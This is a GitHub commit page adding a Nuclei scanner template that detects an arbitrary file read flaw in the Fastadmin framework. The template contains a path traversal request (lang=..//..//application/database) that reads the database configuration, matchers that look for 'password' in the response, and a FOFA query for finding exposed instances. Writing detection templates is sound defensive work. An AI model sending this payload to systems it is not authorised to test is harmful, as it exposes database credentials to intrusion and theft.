Merge pull request #10093 from projectdiscovery/pussycat0x-patch-8

Create fastadmin-lfi.yaml
patch-4
Dhiyaneshwaran 2024-06-24 13:25:02 +08:00 committed by GitHub
commit d811783c9a
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 34 additions and 0 deletions

View File

@ -0,0 +1,34 @@
id: fastadmin-lfi
info:
name: Fastadmin framework - Arbitrary File Read
author: Hel10-Web
severity: high
description: |
Arbitrary file reading vulnerability exists in Fastadmin framework.
reference:
- https://github.com/wy876/POC/blob/main/Fastadmin%E6%A1%86%E6%9E%B6%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 1
fofa-query: app="FASTADMIN-框架"
tags: fastadmin,lfi
http:
- method: GET
path:
- "{{BaseURL}}/index/ajax/lang?lang=..//..//application/database"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'jsonpReturn'
- 'database'
- 'password'
condition: and
- type: status
status:
- 200